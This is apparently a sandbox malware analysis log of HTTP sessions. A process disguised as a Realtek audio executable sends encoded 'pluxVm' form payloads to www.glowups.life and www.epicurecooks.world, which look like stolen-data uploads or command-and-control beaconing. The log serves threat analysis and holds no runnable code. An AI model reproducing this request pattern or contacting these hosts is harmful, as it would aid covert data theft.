                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.glowups.life
                                                                                                                                                                                                                                Referer: http://www.glowups.life/dheh/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 33 4c 30 73 44 36 68 2b 32 56 6b 69 4f 62 37 50 58 75 79 43 4e 64 4e 4d 55 41 79 36 48 6a 32 44 68 66 4b 6a 30 44 59 6f 66 74 38 74 59 72 48 46 75 4a 75 31 39 6d 65 66 4b 68 4f 56 70 4b 67 5a 6e 58 67 62 5a 46 69 76 48 32 38 76 34 65 76 64 74 30 65 79 54 56 7a 62 41 74 73 75 56 69 57 56 76 4e 63 64 71 73 42 68 4d 65 6e 72 38 2f 66 6f 4d 76 72 65 4e 43 78 66 6b 6a 52 64 33 76 4a 4e 6b 58 6a 73 47 63 63 49 51 7a 64 4f 5a 37 69 55 34 67 45 2b 57 69 6a 68 70 4c 54 37 6c 71 4c 56 68 43 59 64 78 35 46 78 4c 32 55 44 65 46 4c 79 63 2f 36 51 66 47 65 48 59 6b 4e 79 36 72 67 41 4d 67 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=3L0sD6h+2VkiOb7PXuyCNdNMUAy6Hj2DhfKj0DYoft8tYrHFuJu19mefKhOVpKgZnXgbZFivH28v4evdt0eyTVzbAtsuViWVvNcdqsBhMenr8/foMvreNCxfkjRd3vJNkXjsGccIQzdOZ7iU4gE+WijhpLT7lqLVhCYdx5FxL2UDeFLyc/6QfGeHYkNy6rgAMg==
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.631900072 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:12 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                10192.168.11.2049769209.74.79.42807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.144032955 CET700OUTPOST /dheh/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.glowups.life
                                                                                                                                                                                                                                Referer: http://www.glowups.life/dheh/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 33 4c 30 73 44 36 68 2b 32 56 6b 69 50 2f 48 50 45 39 71 43 47 64 4e 50 62 67 79 36 49 44 32 48 68 66 47 6a 30 43 73 34 66 66 6f 74 62 50 44 46 76 49 75 31 2b 6d 65 66 42 42 4f 71 6a 71 67 43 6e 57 64 75 5a 46 75 76 48 32 34 76 34 66 2f 64 75 44 79 31 53 46 7a 64 5a 64 73 73 62 43 57 56 76 4e 63 64 71 73 56 4c 4d 65 2f 72 38 50 76 6f 4f 4b 66 5a 52 53 78 63 31 6a 52 64 6d 2f 49 6c 6b 58 69 35 47 5a 45 79 51 78 56 4f 5a 2b 65 55 34 78 45 39 59 69 6a 6e 74 4c 53 4e 71 5a 69 46 73 53 73 56 33 4b 78 32 43 6b 41 38 66 54 47 6f 42 4e 4f 30 63 56 43 31 63 55 30 61 34 70 68 62 52 6e 57 57 71 42 37 65 44 6e 6f 31 50 4d 59 4b 30 69 31 6d 78 45 38 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=3L0sD6h+2VkiP/HPE9qCGdNPbgy6ID2HhfGj0Cs4ffotbPDFvIu1+mefBBOqjqgCnWduZFuvH24v4f/duDy1SFzdZdssbCWVvNcdqsVLMe/r8PvoOKfZRSxc1jRdm/IlkXi5GZEyQxVOZ+eU4xE9YijntLSNqZiFsSsV3Kx2CkA8fTGoBNO0cVC1cU0a4phbRnWWqB7eDno1PMYK0i1mxE8=
                                                                                                                                                                                                                                Dec 3, 2024 14:52:15.316479921 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:15 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                11192.168.11.2049770209.74.79.42807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:17.846971035 CET6445OUTPOST /dheh/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.glowups.life
                                                                                                                                                                                                                                Referer: http://www.glowups.life/dheh/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 33 4c 30 73 44 36 68 2b 32 56 6b 69 50 2f 48 50 45 39 71 43 47 64 4e 50 62 67 79 36 49 44 32 48 68 66 47 6a 30 43 73 34 66 65 51 74 59 38 62 46 75 76 53 31 78 47 65 66 49 68 4f 72 6a 71 68 51 6e 57 46 31 5a 46 53 2f 48 31 51 76 35 2f 6a 64 76 79 79 31 62 46 7a 64 52 39 73 74 56 69 58 64 76 4a 41 42 71 73 46 4c 4d 65 2f 72 38 4d 33 6f 59 50 72 5a 43 69 78 66 6b 6a 52 52 33 76 49 65 6b 54 47 70 47 5a 49 69 52 42 31 4f 41 66 75 55 30 6e 34 39 51 69 6a 6c 71 4c 53 46 71 5a 2f 66 73 57 30 76 33 4c 56 63 43 6e 51 38 64 6b 57 77 46 4f 65 53 50 47 57 2f 63 6e 49 54 33 71 4a 2b 52 48 32 78 75 54 7a 74 4d 44 67 52 4d 2b 55 33 7a 48 5a 79 69 6b 4c 45 52 79 56 43 64 37 73 38 66 50 68 64 72 45 70 5a 61 4a 7a 72 2f 46 4d 57 7a 71 59 7a 35 58 45 69 6f 55 34 61 45 58 4b 77 2b 46 6c 58 4f 7a 63 39 44 46 6a 76 70 45 6d 57 6c 6d 58 47 6d 49 78 36 67 79 59 5a 56 53 31 49 77 67 43 53 79 6d 58 52 6c 56 35 44 36 51 4b 31 75 4b 79 57 51 74 35 6f 32 50 46 35 34 38 63 59 32 4e 32 74 75 6c 44 34 33 57 6b [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=3L0sD6h+2VkiP/HPE9qCGdNPbgy6ID2HhfGj0Cs4feQtY8bFuvS1xGefIhOrjqhQnWF1ZFS/H1Qv5/jdvyy1bFzdR9stViXdvJABqsFLMe/r8M3oYPrZCixfkjRR3vIekTGpGZIiRB1OAfuU0n49QijlqLSFqZ/fsW0v3LVcCnQ8dkWwFOeSPGW/cnIT3qJ+RH2xuTztMDgRM+U3zHZyikLERyVCd7s8fPhdrEpZaJzr/FMWzqYz5XEioU4aEXKw+FlXOzc9DFjvpEmWlmXGmIx6gyYZVS1IwgCSymXRlV5D6QK1uKyWQt5o2PF548cY2N2tulD43Wk7WbvDlu4s76H9DPbsS6aM9Kd8/E3bMDenk+G5RLfadcgUyVh1Gr+FnAvvfC0VYWm5QoePCRWt5T7fw+GXQU4l+SX9Fr0TvBmk0dBpS6TGkdSfT5HLOFpT1sDMj/kc6qpL69Wwp/yu7GnieYUk4Z+O9bSlVcaOByrZDH2JUBh6JaBb31y2G+d7nz1zdC4AiHzmlpBSk9E4CXupdHN25DA45w22S/KmqSxtEHzQxKJ5T3j3jnW0rrrfWrm0LaHSPXz2j38qVHiyI8IDPI/7EJruirK7nM7kHlV/6kdXIMuUbVeDlMr5eRci5fZc60Qa+lNZjn6lTnHCYu0nxDqie3EF977hd/P/LzcHEFa9rPw6kn7ehjxJct/nNSJyBR9HAYbNFSP7rxsvX4p7vcHCGGQi2hDaTYnOnJpgzJrd1VOzOSiVqC6W7lNqS9n83woOSuu1MVD+28CalthIBpxyG5zFz7RNu7Wxdu54TIS3Repc0UjWJCENUd/IaY3z7iAcZeDzpZXL9jaUMCM/g6CZOCVVa8t1piI76dCf3iRazyrebJzcRVtwTB1gD0VFCcWvGuObJmmuVg26NePnE82Mz/MulWww/S5JTRgxT50D27uy3RQmAwNxYGkg+aGQKPlKHIRJuzq8s8JhtIlb2ZKeL3jq90Ahz5aXruhHQ [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:52:17.847080946 CET1404OUTData Raw: 42 39 53 77 72 49 62 6d 2b 4a 58 52 57 53 63 36 50 52 6f 59 78 65 59 70 38 41 65 56 6b 51 51 31 6b 4d 46 55 75 65 66 39 74 6b 39 39 6b 78 48 50 6e 4b 78 75 68 49 44 5a 4d 63 6f 71 33 64 65 37 41 57 69 6e 54 79 46 45 61 50 54 4d 43 74 4a 31 39 79
                                                                                                                                                                                                                                Data Ascii: B9SwrIbm+JXRWSc6PRoYxeYp8AeVkQQ1kMFUuef9tk99kxHPnKxuhIDZMcoq3de7AWinTyFEaPTMCtJ19yi35Qkk+5jJUOlu4mJAKVzKJ3Ds7MNJ5T0KMMekW9rBSHDzaM39jt3MWghk769Z5xJVA3y0GoZskHi9jQpVdggPGOi0QtCXmMP+NCRrrDn9o9x6LqdTANWTtVe1vYxr9j1M/Du0fDAzOdY0yaSwPnBLI+mtdhukOCP
                                                                                                                                                                                                                                Dec 3, 2024 14:52:18.035595894 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:17 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                12192.168.11.2049771209.74.79.42807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.550163984 CET419OUTGET /dheh/?pluxVm=6JcMAOZ0kkEuPLPobYSFFslgEkquVWiK5Nqk+SkmZf4Wc9f19ayTyDiVFSf9h78jkWY5XnirO34u2f/fghaoX1igb+ZsamnQxKAe0eVMQ+zxkvaWI9vtOSA=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:52:20.724860907 CET548INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:20 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 389
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                13192.168.11.2049772208.91.197.27807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:26.119172096 CET698OUTPOST /mdkc/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.epicurecooks.world
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.epicurecooks.world
                                                                                                                                                                                                                                Referer: http://www.epicurecooks.world/mdkc/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 2f 55 2b 6e 59 55 61 33 67 61 43 75 50 34 33 33 35 35 42 55 72 6b 66 4d 42 56 2b 69 4c 37 55 33 54 4e 69 4e 56 6b 66 67 57 5a 75 4a 70 39 72 44 5a 4f 35 4b 41 61 6d 76 77 69 36 59 71 52 4c 38 41 6a 6d 71 39 54 30 37 4f 34 46 4e 6e 73 38 69 2b 46 31 66 36 59 69 42 4a 44 56 49 56 55 44 44 35 52 67 35 73 4e 58 37 5a 54 4a 70 78 39 63 50 51 2b 73 55 49 66 65 64 33 53 52 53 2b 30 77 59 41 4a 46 6e 69 7a 66 79 6b 4f 7a 56 57 7a 30 52 6b 76 31 59 6b 65 47 71 68 79 37 46 70 76 30 57 5a 37 56 33 70 7a 46 68 32 67 73 39 38 39 46 30 63 37 55 58 45 74 7a 73 53 2f 77 4c 2b 64 32 36 43 51 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=/U+nYUa3gaCuP43355BUrkfMBV+iL7U3TNiNVkfgWZuJp9rDZO5KAamvwi6YqRL8Ajmq9T07O4FNns8i+F1f6YiBJDVIVUDD5Rg5sNX7ZTJpx9cPQ+sUIfed3SRS+0wYAJFnizfykOzVWz0Rkv1YkeGqhy7Fpv0WZ7V3pzFh2gs989F0c7UXEtzsS/wL+d26CQ==


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                14192.168.11.2049773208.91.197.27807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:28.782742023 CET718OUTPOST /mdkc/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.epicurecooks.world
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.epicurecooks.world
                                                                                                                                                                                                                                Referer: http://www.epicurecooks.world/mdkc/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 2f 55 2b 6e 59 55 61 33 67 61 43 75 4f 5a 48 33 37 59 42 55 6a 6b 66 50 4e 31 2b 69 5a 37 55 7a 54 4e 6d 4e 56 6c 72 77 57 76 2b 4a 70 5a 76 44 61 4c 5a 4b 42 61 6d 76 6f 79 36 64 75 52 4b 52 41 6a 71 69 39 53 49 37 4f 34 52 4e 6e 75 55 69 69 6d 64 63 37 49 69 48 42 6a 56 4b 49 45 44 44 35 52 67 35 73 4e 44 43 5a 58 64 70 78 73 73 50 43 76 73 4c 46 2f 65 63 32 53 52 53 36 30 77 55 41 4a 46 52 69 33 65 56 6b 4e 4c 56 57 78 73 52 6e 36 5a 62 71 65 47 73 76 53 36 32 35 2b 52 7a 56 4f 4a 44 6f 68 68 4d 77 54 6b 47 35 72 49 75 42 4a 67 7a 48 2b 76 65 57 50 4a 6a 38 66 33 68 66 65 4d 39 36 46 39 6d 6d 49 2b 71 61 56 55 55 2f 34 75 6a 45 6d 63 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=/U+nYUa3gaCuOZH37YBUjkfPN1+iZ7UzTNmNVlrwWv+JpZvDaLZKBamvoy6duRKRAjqi9SI7O4RNnuUiimdc7IiHBjVKIEDD5Rg5sNDCZXdpxssPCvsLF/ec2SRS60wUAJFRi3eVkNLVWxsRn6ZbqeGsvS625+RzVOJDohhMwTkG5rIuBJgzH+veWPJj8f3hfeM96F9mmI+qaVUU/4ujEmc=


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                15192.168.11.2049774208.91.197.27807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:31.454380035 CET2440OUTPOST /mdkc/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.epicurecooks.world
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.epicurecooks.world
                                                                                                                                                                                                                                Referer: http://www.epicurecooks.world/mdkc/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 2f 55 2b 6e 59 55 61 33 67 61 43 75 4f 5a 48 33 37 59 42 55 6a 6b 66 50 4e 31 2b 69 5a 37 55 7a 54 4e 6d 4e 56 6c 72 77 57 76 32 4a 75 71 6e 44 61 71 5a 4b 43 61 6d 76 68 53 36 63 75 52 4c 54 41 67 61 6d 39 53 45 72 4f 37 70 4e 6f 74 73 69 79 54 68 63 77 49 69 48 4e 44 56 48 56 55 43 5a 35 52 77 39 73 4e 54 43 5a 58 64 70 78 76 30 50 53 4f 73 4c 44 2f 65 64 33 53 52 65 2b 30 78 42 41 4e 52 42 69 33 4b 76 6c 38 72 56 58 52 38 52 72 73 4e 62 69 65 47 75 6f 53 36 75 35 2b 74 67 56 50 68 6c 6f 67 6c 6d 77 51 55 47 34 74 31 6e 51 4e 73 51 64 49 58 65 57 63 46 61 36 76 2f 6d 59 4d 78 46 71 6c 45 4c 69 34 33 35 46 58 55 30 37 4b 36 72 66 47 37 6f 54 37 78 47 51 55 47 49 76 71 78 4e 4c 46 76 4f 43 4f 37 6b 53 32 63 6e 75 4f 4a 66 4e 58 72 6a 75 47 74 43 77 30 6c 43 6a 47 72 4f 7a 6c 4a 2f 42 72 47 48 6e 4a 6c 53 32 31 66 44 44 33 35 45 74 37 62 41 6e 71 35 69 69 57 54 49 71 4f 36 61 49 78 42 52 39 50 6f 62 6f 6c 32 34 59 68 2f 63 68 65 2f 71 36 35 57 63 62 4d 74 56 68 75 4c 44 38 62 58 [TRUNCATED]
